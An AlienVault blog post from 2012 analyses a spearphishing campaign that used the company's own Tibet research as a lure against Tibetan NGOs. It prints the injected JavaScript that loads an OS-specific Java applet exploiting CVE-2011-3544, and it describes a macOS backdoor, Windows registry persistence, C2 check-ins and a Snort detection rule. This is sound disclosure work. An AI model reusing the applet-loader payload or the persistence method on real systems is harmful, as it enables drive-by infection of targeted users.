AlienVault Tibet related Research now used to target Tibetan non-governmental organizations

March 19, 2012  |  Jaime Blasco

A few hours ago Greg Walton posted a warning on spearphishing mails sent to non-governmental organizations related to Tibet. The content of these emails is about our previous research Targeted Attacks against Tibetan organizations.

—————Forwarded message—————

From: webmaster <>

Date: Mon, Mar 19, 2012 at 8:20 AM

Subject: Targeted attacks against Tibet organizations

To: ......

We recently detected several targeted attacks against Tibetan activist organizations including the Central

Tibet Administration and International Campaign for Tibet, among others.

Here is one of the emails detected:

[ More information ]

It contains a link to hxxp:// that hosts a copy of our blog post but includes some Javascript:


var emb = document.createElement(‘applet’);

emb.setAttribute(‘name’, ‘applet’);

emb.setAttribute(‘width’, ‘1’);

emb.setAttribute(‘height’, ‘1’);

emb.setAttribute(‘code’, ‘Func1.class’);

if (navigator.userAgent.indexOf(‘Win’) != -1){

emb.setAttribute('archive', 'default.jar');


else if (navigator.userAgent.indexOf(‘Linux’) != -1){

emb.setAttribute('archive', 'index.jar');


else if (navigator.userAgent.indexOf(‘Mac’) != -1){

emb.setAttribute('archive', 'index.jar')




The domain is also pointing to that server.

Based on the user-agent (Mac or Windows) it loads a Java applet that exploits CVE-2011-3544.

The attack contains malware to infect both Windows and MacOSX.

The MacOSX backdoor has 0/0 antivirus detection rate:

bash-3.2# nm -a file.tmp

U ___error

U ___memcpy_chk

U ___stack_chk_fail

U ___stack_chk_guard

U ___strcat_chk

0000000100000000 A __mh_execute_header

U _alarm

U _close

U _connect

U _creat

U _dup2

U _execl

U _exit

U _fork

U _gethostbyname

U _getpid

U _getpwuid

U _gettimeofday

U _getuid

U _ioctl

U _malloc

U _memcmp

U _memcpy

U _memset

U _open

U _openpty

U _putenv

U _rand

U _read

U _recv

U _select$1050

U _send

U _setsid

U _shutdown

U _signal

U _sleep

U _socket

U _strncpy

U _ttyname

U _waitpid

U _write

U dyld_stub_binder

0000000005614542 - 00 0000   OPT radr://5614542

bash-3.2# otool -L file.tmp


/usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 125.2.10)

<?xml version=“1.0” encoding=“UTF-8”?>

<!DOCTYPE plist PUBLIC “-//Apple Computer//DTD PLIST 1.0//EN” “”>

<plist version=“1.0”>












The trojan connects to the following server: ( -

530 W. 6th St Suite 701

Los Angeles, CA


The domain has been involved in several attacks during the past using Win32/Protux.

The Windows payload is detected by AVG as BackDoor.Generic15.VKZ

The Windows payload seems to have been created 6 days ago:

It copies itself to  “C:\WINDOWS\system32\2019\svchost .exe” and modifies HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders -> Startup to maintain persistence.

It connects to the following servers: ( -

530 W. 6th St Suite 701

Los Angeles, CA

US ( -

530 W. 6th St Suite 701

Los Angeles, CA

US ( -

530 W. 6th St Suite 701

Los Angeles, CA


Once it connects to one of the servers (port 8080) , it sends some information about the victim like the ComputerName using some obfuscation:

You can use the following rule to catch this traffic on your network:

alert tcp $HOME_NET any -> $EXTERNAL_NET 8080 (msg:“MALWARE WUpdater checkin”; content:”|3C|html|3E||3C|title|3E|12356|3C||2F|title|3E||3C|body|3E|”; depth:33; classtype:trojan-activity; sid:11111111111111; rev:1;)

We will publish more information about this and ongoing attacks as soon as we have more information. Stay tuned.

Update: There is another sample of BackDoor.Generic15.VKZ (222a150bf0399f23af6d59f695304610) which used as the C&C server. Check your logs!

Share this with others


Get price Free trial